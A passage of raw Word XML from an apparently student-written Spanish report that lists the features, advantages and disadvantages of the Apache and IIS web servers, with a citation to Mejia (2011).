    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es desarrollada dentro del proyecto HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es altamente configurable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiene amplia aceptación en la red</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es modular</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pose código abierto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Multi-plataforma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es extensible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es fácil de conseguir ayuda/soporte (Es popular)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al momento de la instalación permite elegir sobre que servidores web va a correr.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Posee licencia freeware gracias a su amplio nivel de capacitación, su costo y su compatibilidad con los S.O</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Falta de integración</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Posee formatos de configuración no estándar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No posee buena administración</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E72E03" w:rsidRDefault="00E72E03" w:rsidP="00E72E03">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E72E03" w:rsidRDefault="00E72E03" w:rsidP="00E72E03">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E72E03" w:rsidRPr="00850F64" w:rsidRDefault="00E72E03" w:rsidP="00E72E03">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00A319D8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00E72E03" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F2921A8" wp14:editId="47FD1AA6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1598485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>402590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2503805" cy="1146175"/>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44585C.tmp"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2503805" cy="1146175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00A319D8" w:rsidRDefault="00850F64" w:rsidP="00A319D8"/>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00A319D8" w:rsidP="00A319D8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00A319D8">
        <w:t>IIS es un conjunto de servicios para servidores usando Microsoft Windows. Es especialmente usado en servidores web, que actualmente es el segundo más popular sistema de servidor web (funciona en el 35% de los servidores de todos los sitios web).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A319D8" w:rsidRDefault="00A319D8" w:rsidP="00A319D8"/>
    <w:p w:rsidR="00880390" w:rsidRPr="00A319D8" w:rsidRDefault="00880390" w:rsidP="00A319D8"/>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00880390">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dotación de instrumentos satélite al servidor web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arquitectura completamente renovada respecto a las versiones precedentes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una de sus características más importantes es la presencia del protocolo HTTP 1.1 que ofrece sensibles mejoras de las prestaciones, disminuyendo los tiempos de respuesta en la transmisión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00880390">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="00BB6F0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es confiable, seguro y administrable en internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Proporcionan capacidades de servidores web integrado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al momento de la instalación permiten elegir sobre que servidor web va a correr (apache o IIS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Desarrolla y es compatible con las aplicaciones beneficiándose con un único entorno de alojamiento de aplicaciones integrado con compatibilidad total.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00880390">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="00BB6F0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiende a limitarse en las versiones que no son de la familia “Server”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Posee vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="0006563F" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este servidor no es multiplataforma, sólo funciona bajo Windows.</w:t>
      </w:r>
      <w:r w:rsidR="00FD163F" w:rsidRPr="00FD163F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2104956415"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:instrText xml:space="preserve"> CITATION Mej11 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Mejia, 2011)</w:t>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="0006563F" w:rsidRPr="00850F64" w:rsidRDefault="0006563F" w:rsidP="0006563F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:suppressAutoHyphens/>
